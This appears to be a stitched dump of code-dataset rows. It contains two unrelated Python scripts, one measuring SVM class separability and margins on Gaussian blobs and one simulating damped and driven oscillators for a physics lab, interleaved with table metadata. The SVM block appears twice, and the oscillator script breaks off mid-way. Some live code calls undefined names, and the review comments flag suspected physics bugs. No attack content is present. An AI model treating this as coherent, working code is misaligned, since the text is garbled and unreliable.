    # set_params(C=C) overwrites it with a scalar before each fit.
    clf = svm.SVC(kernel='linear', C=Cs)
    # NOTE(review): several of these accumulators (C, test_errors,
    # number_of_misclassified_test_points, ...) are never used afterwards.
    C = []
    Margin = []
    train_errors = []
    test_errors = []
    number_of_misclassified_train_points = []
    number_of_misclassified_test_points = []
    Train_hinge_loss = []
    cost_training = []
    Test_hinge_loss = []
    cost_testing = []
    for C in Cs:
        clf.set_params(C=C)
        clf.fit(X_train, y_train)
        i = i
        w = clf.coef_[0]
        y_train_predict = clf.predict(X_train)
        train_error = metrics.mean_squared_error(y_train, y_train_predict)
        train_errors.append(train_error)
        misclassified_train = np.where(y_train != y_train_predict)
        number_of_misclassified_train_points.append(misclassified_train)
        pred_decision_train = clf.decision_function(X_train)
        hinge_loss_train = hinge_loss(y_train, pred_decision_train)
        Train_hinge_loss.append(hinge_loss_train)
        pred_decision_test = clf.decision_function(X_test)
        hinge_loss_test = hinge_loss(y_test, pred_decision_test)
        Test_hinge_loss.append(hinge_loss_test)
        # Primal SVM objective: 0.5*||w||^2 + C * hinge loss.
        cost_train = 1/2 * np.dot(w, w) + C * hinge_loss_train
        cost_training.append(cost_train)
        cost_test = 1/2 * np.dot(w, w) + C * hinge_loss_test
        cost_testing.append(cost_test)
        # alpha=clf.dual_coef_
        # alphas.append(alpha)
        # ξ=y_train*clf.decision_function(X_train)
        # ξs.append(ξ)
        a = -w[0] / w[1]
        # Geometric margin width 2/||w||.
        M = 2 / np.sqrt(np.sum(w ** 2))
        Margin.append(M)
        lst.append([i, C, M, hinge_loss_train, cost_train, hinge_loss_test,
                    cost_test])
comp_list = []
df = pd.DataFrame(lst, columns=cols)
for i in range(iteration_num):
    temp_df = df[df['iteration'] == i]
    temp_ar = temp_df.to_numpy()
    comp_list.append(temp_ar)
# Drop the i == 0 slice: iterations start at 1, so that frame is empty.
del comp_list[0]
array_sum = comp_list[0] + comp_list[1]
for i in range(len(comp_list)-2):
    array_sum = array_sum + comp_list[i+2]
averaged_data = array_sum/len(comp_list)
# plotting the average
fig, ax = plt.subplots()
ax.plot(averaged_data[:, 2], averaged_data[:, 5])
ax.set(xlabel='C values', ylabel='test cost',
       title='test')
ax.grid()
df.to_excel(r'dataset_one.xlsx', index=False, header=True)
# %%
# fit the model and get the separating hyperplane
clf = svm.SVC(kernel='linear', C=1.0)
clf.fit(X_s, y)
# fit the model and get the separating hyperplane using weighted classes
wclf = svm.SVC(kernel='linear', class_weight={1: 10})
wclf.fit(X_s, y)
fig, ax = plt.subplots()
# plot the samples
ax.scatter(X_s[:, 0], X_s[:, 1], c=y, cmap=plt.cm.Paired, edgecolors='k')
# plot the decision functions for both classifiers
ax = plt.gca()
xlim = ax.get_xlim()
ylim = ax.get_ylim()
# create grid to evaluate model
xx = np.linspace(xlim[0], xlim[1], 30)
yy = np.linspace(ylim[0], ylim[1], 30)
YY, XX = np.meshgrid(yy, xx)
xy = np.vstack([XX.ravel(), YY.ravel()]).T
# get the separating hyperplane
Z = clf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins
a = ax.contour(XX, YY, Z, colors='k', levels=[0], alpha=0.5, linestyles=['-'])
# get the separating hyperplane for weighted classes
Z = wclf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins for weighted classes
b = ax.contour(XX, YY, Z, colors='r', levels=[0], alpha=0.5, linestyles=['-'])
plt.legend([a.collections[0], b.collections[0]], ["non weighted", "weighted"],
           loc="upper right")
plt.show()
| 29.336343 | 80 | 0.623115 | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 4 18:45:05 2021.
@author: mahdi
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
from sklearn.datasets import make_blobs
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import NearestCentroid
import statistics
import math
from scipy import stats
from scipy.stats import linregress
import pandas as pd
from sklearn import metrics
from sklearn.model_selection import train_test_split
from sklearn.metrics import hinge_loss
# %% Functions
def unit_vector(vector):
    """
    Scale the input vector to unit length.

    Parameters
    ----------
    vector : numpy array
        The input vector.

    Returns
    -------
    TYPE : numpy array
        ``vector`` divided by its Euclidean norm.
    """
    norm = np.linalg.norm(vector)
    return vector / norm
def angle_between(v1, v2):
    """
    Calculate the angle between two vectors, in radians.

    Parameters
    ----------
    v1 : numpy array
        vector 1.
    v2 : numpy array
        vector 2.

    Returns
    -------
    TYPE :
        Angle in [0, pi]; the cosine is clipped to [-1, 1] to absorb
        floating-point round-off before arccos.
    """
    cosine = np.dot(unit_vector(v1), unit_vector(v2))
    return np.arccos(np.clip(cosine, -1.0, 1.0))
def projection_on_line(c_center_1, c_center_2, original_data):
    """
    Project a data point onto the line through both cluster centers.

    Parameters
    ----------
    c_center_1 : numpy 1 by 2 array
        first center coordinates.
    c_center_2 : numpy 1 by 2 array
        second center coordinates.
    original_data : numpy n by 2 array
        data points.

    Returns
    -------
    numpy array
        Coordinates of the point projected onto the line connecting the
        two centers.
    """
    axis = c_center_1 - c_center_2
    offset = original_data - c_center_1
    # Scalar projection of the offset onto the center-to-center axis.
    scale = np.dot(offset, axis) / np.dot(axis, axis)
    return c_center_1 + scale * axis
def calculate_center(original_data):
    """
    Calculate the centroid of the data points.

    Parameters
    ----------
    original_data : numpy array
        The data points, one sample per row.

    Returns
    -------
    center_co : numpy array
        The coordinates of the center point (column-wise mean).
    """
    return np.sum(original_data, axis=0) / original_data.shape[0]
def calculate_pvar(pdata):
    """
    Variance of points already projected onto a line.

    Each point is assigned a signed distance from the centroid; the sign is
    taken relative to the offset direction of the point at index 1, so the
    input must hold at least two points and no point should coincide with
    the centroid (a zero offset makes unit_vector divide by zero).

    Parameters
    ----------
    pdata : numpy array
        the coordinates of the data projected on the line

    Returns
    -------
    data_var : numpy array
        the variance of the signed distances along the line.
    """
    centroid = calculate_center(pdata)
    offsets = pdata - np.full(pdata.shape, centroid)
    # Reference direction fixing the sign convention (point at index 1).
    reference = unit_vector(offsets[1, :])
    signed_dists = []
    for row in range(pdata.shape[0]):
        orientation = np.dot(reference, unit_vector(offsets[row, :]))
        signed_dists.append(np.sign(orientation) * np.linalg.norm(offsets[row, :]))
    return np.var(np.array(signed_dists))
def calculate_dvar(pdata):
    """
    Mean squared distance of the points from their centroid.

    Parameters
    ----------
    pdata : numpy array
        the coordinates of the data projected on the line

    Returns
    -------
    data_var : numpy array
        the average of the squared centroid distances.
    """
    centroid = calculate_center(pdata)
    offsets = pdata - np.full(pdata.shape, centroid)
    squared = np.power(np.linalg.norm(offsets, axis=1), 2)
    return np.sum(squared) / pdata.shape[0]
def rotate_data(X_data, y):
    """
    Rotate the points so the line through the two class centers becomes
    horizontal (which simplifies the variance calculation downstream).

    Parameters
    ----------
    X_data : numpy array
        The data points to rotate, one sample per row.
    y : numpy array
        Labels (+1 / -1) for X_data.

    Returns
    -------
    X_rotated : numpy array
        Rotated numpy array.
    """
    center_p = calculate_center(X_data[y == 1])
    center_n = calculate_center(X_data[y == -1])
    # Angle of the center-to-center segment; rotate by its negative so the
    # segment lands on the x axis.
    slope = (center_p[1] - center_n[1]) / (center_p[0] - center_n[0])
    theta = -math.atan(slope)
    cos_t, sin_t = np.cos(theta), np.sin(theta)
    rotation_mat = np.array(((cos_t, -sin_t), (sin_t, cos_t)))
    rotated = [rotation_mat.dot(point) for point in X_data]
    return np.array(rotated)
# %% Generating the data
# Two Gaussian blobs (2000 points each); labels are remapped to {+1, -1}.
n_samples_1 = 2000
n_samples_2 = 2000
centers = [[-2, 0.0], [2, 2.0]] # cluster centers
clusters_std = [0.7, 0.7] # cluster std_dev
X, y = make_blobs(n_samples=[n_samples_1, n_samples_2],
                  centers=centers,
                  cluster_std=clusters_std,
                  random_state=0, shuffle=False)
y = np.where(y == 1, 1, -1)
# %% Preprocessing step
# NOTE(review): scaling is disabled — 'scaler' is created but never used.
scaler = StandardScaler()
# X_s = scaler.fit_transform(X)
X_s = X
X_pos = X_s[y == 1]
X_neg = X_s[y == -1]
center_1 = NearestCentroid()
center_1.fit(X_s, y)
data_centers = center_1.centroids_
c_y = np.array([[1], [-1]])
pos_center = calculate_center(X_pos)
neg_center = calculate_center(X_neg)
print(f'The cluster centers are: {center_1.centroids_}')
# %% calculating S&S for clusters
# Calculate the distance of the centers
distance = np.linalg.norm(data_centers[0, :] - data_centers[1, :])
# First projecting the data on to the line which goes through the centers
X_pro = []
for i in range(X_s.shape[0]):
    projected_data = projection_on_line(data_centers[0, :], data_centers[1, :],
                                        X_s[i])
    X_pro.append(projected_data)
X_pro = np.array(X_pro)
X_pro_pos = X_pro[y == 1]
X_pro_neg = X_pro[y == -1]
var_x_pos = calculate_pvar(X_pro_pos)
var_x_neg = calculate_pvar(X_pro_neg)
# Pooled (sample-size weighted) variance of the two projected clusters.
total_var = ((X_pro_pos.shape[0] * var_x_pos) +
             (X_pro_neg.shape[0] * var_x_neg)) / (X_pro_pos.shape[0] +
                                                  X_pro_neg.shape[0])
sigma = np.sqrt(total_var)
# Separability score in dB: center distance relative to the 6-sigma spread.
SandS = 20 * np.log10(distance / (6 * sigma))
# Projection of the data on to the X axis
X_rota = rotate_data(X_pro, y)
X_rota_pos = X_rota[y == 1]
X_rota_neg = X_rota[y == -1]
# %% Plotting the data and central points
fig, ax = plt.subplots()
ax.scatter(X_s[:, 0], X_s[:, 1], marker="o", s=20,
           color=["coral" if y == -1 else "cyan" for y in y])
ax.scatter(data_centers[:, 0], data_centers[:, 1],
           color=["lime" if y == 1 else "r" for y in c_y])
# %% plotting the projection on to the line going through two centers
fig, ax = plt.subplots()
# xmin, xmax = -10, 10
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottom x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
# make the box square shape
ax.set_aspect('equal')
ax.scatter(X_pro[:, 0], X_pro[:, 1], marker="o", s=20,
           color=["r" if y == -1 else "b" for y in y], alpha=0.5)
ax.scatter(X_s[:, 0], X_s[:, 1], alpha=0.5)
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
ax.set_title('Projected and datas')
# %% Plotting the rotated data
fig, ax = plt.subplots()
# xmin, xmax = -5, 0
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottom x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')`
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
# ax.xaxis.set_ticks_position('bottom')
# ax.yaxis.set_ticks_position('left')
# make the box square shape
# ax.set_aspect('equal')
ax.scatter(X_rota[:, 0], X_rota[:, 1], marker="o", s=20,
           color=["r" if y == -1 else "b" for y in y])
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
# %% Ishtiaque approach
# make a dataframe with following columns
cols = ['iteration', 'C', 'Margin', 'Train_hinge_loss', 'cost_training',
        'Test_hinge_loss', 'cost_testing']
lst = []
iteration_num = 10
for i in range(1, iteration_num):
    # NOTE(review): random_state=1 makes every "iteration" use the same
    # split, so the 9 passes produce identical rows — confirm intended.
    X_train, X_test, y_train, y_test = train_test_split(X_s, y, test_size=0.40,
                                                        random_state=1)
    # NOTE(review): 'i = i' is a no-op (here and inside the inner loop).
    i = i
    Cs = np.logspace(-1, 2, 1000).tolist()
    Cs = np.array(Cs)
    # NOTE(review): C receives the whole array here; this only works because
    # set_params(C=C) overwrites it with a scalar before each fit.
    clf = svm.SVC(kernel='linear', C=Cs)
    # NOTE(review): several of these accumulators (C, test_errors,
    # number_of_misclassified_test_points, ...) are never used afterwards.
    C = []
    Margin = []
    train_errors = []
    test_errors = []
    number_of_misclassified_train_points = []
    number_of_misclassified_test_points = []
    Train_hinge_loss = []
    cost_training = []
    Test_hinge_loss = []
    cost_testing = []
    for C in Cs:
        clf.set_params(C=C)
        clf.fit(X_train, y_train)
        i = i
        w = clf.coef_[0]
        y_train_predict = clf.predict(X_train)
        train_error = metrics.mean_squared_error(y_train, y_train_predict)
        train_errors.append(train_error)
        misclassified_train = np.where(y_train != y_train_predict)
        number_of_misclassified_train_points.append(misclassified_train)
        pred_decision_train = clf.decision_function(X_train)
        hinge_loss_train = hinge_loss(y_train, pred_decision_train)
        Train_hinge_loss.append(hinge_loss_train)
        pred_decision_test = clf.decision_function(X_test)
        hinge_loss_test = hinge_loss(y_test, pred_decision_test)
        Test_hinge_loss.append(hinge_loss_test)
        # Primal SVM objective: 0.5*||w||^2 + C * hinge loss.
        cost_train = 1/2 * np.dot(w, w) + C * hinge_loss_train
        cost_training.append(cost_train)
        cost_test = 1/2 * np.dot(w, w) + C * hinge_loss_test
        cost_testing.append(cost_test)
        # alpha=clf.dual_coef_
        # alphas.append(alpha)
        # ξ=y_train*clf.decision_function(X_train)
        # ξs.append(ξ)
        a = -w[0] / w[1]
        # Geometric margin width 2/||w||.
        M = 2 / np.sqrt(np.sum(w ** 2))
        Margin.append(M)
        lst.append([i, C, M, hinge_loss_train, cost_train, hinge_loss_test,
                    cost_test])
comp_list = []
df = pd.DataFrame(lst, columns=cols)
for i in range(iteration_num):
    temp_df = df[df['iteration'] == i]
    temp_ar = temp_df.to_numpy()
    comp_list.append(temp_ar)
# Drop the i == 0 slice: iterations start at 1, so that frame is empty.
del comp_list[0]
array_sum = comp_list[0] + comp_list[1]
for i in range(len(comp_list)-2):
    array_sum = array_sum + comp_list[i+2]
averaged_data = array_sum/len(comp_list)
# plotting the average
fig, ax = plt.subplots()
ax.plot(averaged_data[:, 2], averaged_data[:, 5])
ax.set(xlabel='C values', ylabel='test cost',
       title='test')
ax.grid()
df.to_excel(r'dataset_one.xlsx', index=False, header=True)
# %%
# fit the model and get the separating hyperplane
clf = svm.SVC(kernel='linear', C=1.0)
clf.fit(X_s, y)
# fit the model and get the separating hyperplane using weighted classes
wclf = svm.SVC(kernel='linear', class_weight={1: 10})
wclf.fit(X_s, y)
fig, ax = plt.subplots()
# plot the samples
ax.scatter(X_s[:, 0], X_s[:, 1], c=y, cmap=plt.cm.Paired, edgecolors='k')
# plot the decision functions for both classifiers
ax = plt.gca()
xlim = ax.get_xlim()
ylim = ax.get_ylim()
# create grid to evaluate model
xx = np.linspace(xlim[0], xlim[1], 30)
yy = np.linspace(ylim[0], ylim[1], 30)
YY, XX = np.meshgrid(yy, xx)
xy = np.vstack([XX.ravel(), YY.ravel()]).T
# get the separating hyperplane
Z = clf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins
a = ax.contour(XX, YY, Z, colors='k', levels=[0], alpha=0.5, linestyles=['-'])
# get the separating hyperplane for weighted classes
Z = wclf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins for weighted classes
b = ax.contour(XX, YY, Z, colors='r', levels=[0], alpha=0.5, linestyles=['-'])
plt.legend([a.collections[0], b.collections[0]], ["non weighted", "weighted"],
           loc="upper right")
plt.show()
| 0 | 0 | 0 |
86d698c9a546a498b829518be815313ee7a80870 | 8,941 | py | Python | Week 11/Lab_5.py | aash7871/PHYS-3210 | 7820e85259b5fbc2845feaa1068ef12afc13db77 | [
"MIT"
] | null | null | null | Week 11/Lab_5.py | aash7871/PHYS-3210 | 7820e85259b5fbc2845feaa1068ef12afc13db77 | [
"MIT"
] | null | null | null | Week 11/Lab_5.py | aash7871/PHYS-3210 | 7820e85259b5fbc2845feaa1068ef12afc13db77 | [
"MIT"
] | 1 | 2020-01-17T01:58:14.000Z | 2020-01-17T01:58:14.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 29 19:02:02 2019
@author: amandaash
"""
import numpy as np
import matplotlib.pyplot as plt
"""
dt = 0.0001
mass = 1
p_value = 2
k_constant = 100
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 10
static_coeff = 0.45
kinetic_coeff = 0.35
viscous_coeff = 0.6
plt.title('damped oscillator, P = {0}, k = {1}, $\\mu_s$ = {2}, $\\mu_k$ = {3}, b = {4}' .format(p_value, k_constant, static_coeff, kinetic_coeff, viscous_coeff))
x_val,v_val,t_val = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,static_coeff,kinetic_coeff,viscous_coeff)
period, angular_frequency = find_period(v_val, dt)
#print(angular_frequency, angular_frequency*2*m)
plt.plot(x_val, t_val)
plt.xlabel('x[m]')
plt.ylabel('t[s]')
#plt.plot(v_val, t_val)
plt.show()
dt = 0.0001
mass = 1
p_value = 2
k_constant = 1
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 100
F_drive = 10000
frequency_drive = 10
#Large Driving Force:
plt.title('overwhelmed driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.plot(x_drive, t_drive, '-')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.show()
#beats conditions?: dt = 0.0001, m = 1, p = 2, k = 10, v0 = 0, x0 = 1, t0 = 0, tf = 10, F0 = 10, omega = 1
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 75
F_drive = 10
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
print(natural_frequency)
epsilon = 0.1
frequency_drive = natural_frequency + epsilon
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
plt.legend()
plt.savefig('beats.pdf')
plt.show()
#resonance conditions?: dt = 0.001, m = 1, p = 2, k = 1, v0 = 0, x0 = 1, t0 = 0, tf = 40, F0 = 1, omega = 1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp.pdf')
plt.show()
"""
# Sweep the driving frequency and record the peak displacement of a damped,
# driven oscillator (amplitude-response curve).
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 20
F_drive = 10
# NOTE(review): 'natural_frequency' is not defined anywhere above in this
# copy of the file, so this line raises NameError as written — presumably it
# was computed by code that is no longer present; confirm.
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.8)
amplitudes = []
for frequency in frequency_array:
    # NOTE(review): 'harmonic_oscillator_drive_friction' and 'b' are also
    # undefined in this copy — verify against the original script.
    x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
    max_amp = np.max(x_drive)
    amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction_1.pdf')
plt.show()
"""
#non-linear resonance
dt = 0.0001
mass = 1
p_value = 4
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 60
F_drive = 1
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,natural_frequency)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, natural_frequency))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
#plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
#plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
#plt.legend()
plt.savefig('beats_nonharmonic.pdf')
plt.show()
#effect of friction on amp v. drive frequency:
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 75
F_drive = 10
b = 0.1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction.pdf')
plt.show()
"""
| 29.411184 | 162 | 0.621071 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 29 19:02:02 2019
@author: amandaash
"""
import numpy as np
import matplotlib.pyplot as plt
def harmonic_oscillator_friction_beta(p,k,v0,x0,m,time_step,t0,tf, mu_s, mu_k, b):
    """
    Integrate an oscillator with restoring force -k*x**(p-1), static/kinetic
    dry friction (mu_s, mu_k) and viscous damping (b), using a half-step
    (midpoint) scheme.

    :param p: force-law exponent (p=2 gives a linear spring)
    :param k: spring constant
    :param v0: initial velocity
    :param x0: initial position
    :param m: mass
    :param time_step: integration step dt
    :param t0: start time
    :param tf: end time
    :param mu_s: static friction coefficient
    :param mu_k: kinetic friction coefficient
    :param b: viscous damping coefficient
    :return: (x_val, v_val, t_val) lists of positions, velocities and times;
        integration stops early when static friction pins the mass
    """
    g = 9.81
    v = v0
    x = x0
    x_val = []
    v_val = []
    time_array = np.arange(t0,tf, time_step)
    t_val = []
    for n in time_array:
        # Treat |v| < 1e-5 as "at rest": static-friction regime.
        if np.isclose(v,0, atol = 10**-5):
            # NOTE(review): the static-friction term enters with a fixed '+'
            # sign regardless of the spring-force direction — verify.
            a = (-k/m)*x**(p-1) + (mu_s*g)
            # Static friction can hold the mass against the spring: stop.
            # NOTE(review): the message says "failure", but this branch fires
            # when friction is strong enough to hold the mass — confirm wording.
            if (mu_s*m*g) >= np.abs((k)*x**(p-1)):
                print('Static Friction failure, F_f = {0} N, F_spring = {1} N'.format(str((mu_s*m*g)), str(np.abs((k)*x**(p-1)))))
                break
            else:
                t_val.append(n)
                x_half = x + (time_step/2)*v
                v_half = v + ((time_step/2)*(a))
                a_half = (-k/m)*x_half**(p-1) + (mu_s*g)
                # NOTE(review): 'a_half' already contains the 1/m factors, so
                # dividing by m again looks like a double mass division
                # (harmless only when m == 1) — confirm.
                vf = v + ((time_step)/m)*(a_half)
                xf = x + (time_step)*v_half
                x_val.append(x)
                v_val.append(v)
                v = vf
                x = xf
        else:
            #print('False')
            # Kinetic regime: spring + kinetic friction opposing the motion
            # (v/|v| is the sign of v) + viscous drag.
            a = (-k/m)*x**(p-1) - (mu_k*g*(v/np.abs(v))) - ((b/m)*v)
            t_val.append(n)
            #first Euler's method to find half step:
            x_half = x + (time_step/2)*v
            v_half = v + ((time_step/2)*(a))
            a_half = (-k/m)*x_half**(p-1) - (mu_k*g*(v_half/np.abs(v_half))) - ((b/m)*v_half)
            # NOTE(review): same suspected double division by m as above.
            vf = v + ((time_step)/m)*(a_half)
            xf = x + (time_step)*v_half
            x_val.append(x)
            v_val.append(v)
            v = vf
            x = xf
    return x_val, v_val, t_val
def harmonic_oscillator_drive(p,k,v0,x0,m,time_step,t0,tf, F0, omega, mu_s = 0, mu_k = 0, b = 0):
    """
    Integrate a sinusoidally driven oscillator with restoring force
    -k*x**(p-1), using a midpoint (RK2) scheme: an Euler half step, then a
    full step with the midpoint acceleration.

    :param p: force-law exponent (p=2 gives a linear spring)
    :param k: spring constant
    :param v0: initial velocity
    :param x0: initial position
    :param m: mass
    :param time_step: integration step dt
    :param t0: start time
    :param tf: end time
    :param F0: driving-force amplitude
    :param omega: driving angular frequency
    :param mu_s, mu_k, b: accepted for interface parity with the friction
        variants but unused here (this variant has no friction)
    :return: (x_val, v_val, time_array) with x_val[i] = x(t_i)
    """
    v = v0
    x = x0
    x_val = []
    v_val = []
    time_array = np.arange(t0, tf, time_step)
    for n in time_array:
        a = ((-k/m)*x**(p-1)) + ((F0/m)*np.sin(omega*n))
        # Euler half step to the midpoint.
        x_half = x + (time_step/2)*v
        v_half = v + (time_step/2)*a
        a_half = ((-k/m)*x_half**(p-1)) + ((F0/m)*np.sin(omega*(n + time_step/2)))
        # BUG FIX: a_half is already an acceleration (the forces above are
        # divided by m), so the update is v + dt*a_half; the previous code
        # used dt/m * a_half and thus divided by the mass twice.
        vf = v + time_step*a_half
        xf = x + time_step*v_half
        x_val.append(x)
        v_val.append(v)
        v = vf
        x = xf
    # (The old, unused F_sp spring-force accumulator was removed.)
    return x_val, v_val, time_array
def harmonic_oscillator_drive_friction(p,k,v0,x0,m,time_step,t0,tf, F0, omega, b ):
    """
    Integrate a sinusoidally driven oscillator with restoring force
    -k*x**(p-1) and viscous damping coefficient b, using a midpoint (RK2)
    scheme: an Euler half step, then a full step with the midpoint
    acceleration.

    :param p: force-law exponent (p=2 gives a linear spring)
    :param k: spring constant
    :param v0: initial velocity
    :param x0: initial position
    :param m: mass
    :param time_step: integration step dt
    :param t0: start time
    :param tf: end time
    :param F0: driving-force amplitude
    :param omega: driving angular frequency
    :param b: viscous damping coefficient
    :return: (x_val, v_val, time_array) with x_val[i] = x(t_i)
    """
    v = v0
    x = x0
    x_val = []
    v_val = []
    time_array = np.arange(t0, tf, time_step)
    for n in time_array:
        a = ((-k/m)*x**(p-1)) + ((F0/m)*np.sin(omega*n)) - ((b/m)*v)
        # Euler half step to the midpoint.
        x_half = x + (time_step/2)*v
        v_half = v + (time_step/2)*a
        # BUG FIX: the midpoint acceleration previously dropped the damping
        # term; include -(b/m)*v_half so the drag is applied consistently
        # (matching the non-driven friction integrator in this file).
        a_half = ((-k/m)*x_half**(p-1)) + ((F0/m)*np.sin(omega*(n + time_step/2))) - ((b/m)*v_half)
        # BUG FIX: a_half is already an acceleration, so the update is
        # v + dt*a_half; the previous code divided by the mass a second time.
        vf = v + time_step*a_half
        xf = x + time_step*v_half
        x_val.append(x)
        v_val.append(v)
        v = vf
        x = xf
    return x_val, v_val, time_array
def find_period(velocity_array, time_step):
    """
    Estimate the oscillation period from the first sign flip of the velocity.

    Scans for the first index i >= 2 where v[i-1] and v[i+1] have opposite
    signs; a half period has elapsed by then, so the period is 2*i*dt.

    :param velocity_array: sampled velocities, uniformly spaced in time
    :param time_step: sampling interval dt
    :return: (period, angular_frequency), or None if no sign change is
        found before the end of the array
    """
    for i, _ in enumerate(velocity_array):
        if i < 2:
            continue
        if np.sign(velocity_array[i - 1]) != np.sign(velocity_array[i + 1]):
            half_period = i * time_step
            return 2 * half_period, (2 * np.pi) / (2 * half_period)
"""
dt = 0.0001
mass = 1
p_value = 2
k_constant = 100
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 10
static_coeff = 0.45
kinetic_coeff = 0.35
viscous_coeff = 0.6
plt.title('damped oscillator, P = {0}, k = {1}, $\\mu_s$ = {2}, $\\mu_k$ = {3}, b = {4}' .format(p_value, k_constant, static_coeff, kinetic_coeff, viscous_coeff))
x_val,v_val,t_val = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,static_coeff,kinetic_coeff,viscous_coeff)
period, angular_frequency = find_period(v_val, dt)
#print(angular_frequency, angular_frequency*2*m)
plt.plot(x_val, t_val)
plt.xlabel('x[m]')
plt.ylabel('t[s]')
#plt.plot(v_val, t_val)
plt.show()
dt = 0.0001
mass = 1
p_value = 2
k_constant = 1
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 100
F_drive = 10000
frequency_drive = 10
#Large Driving Force:
plt.title('overwhelmed driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.plot(x_drive, t_drive, '-')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.show()
#beats conditions?: dt = 0.0001, m = 1, p = 2, k = 10, v0 = 0, x0 = 1, t0 = 0, tf = 10, F0 = 10, omega = 1
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
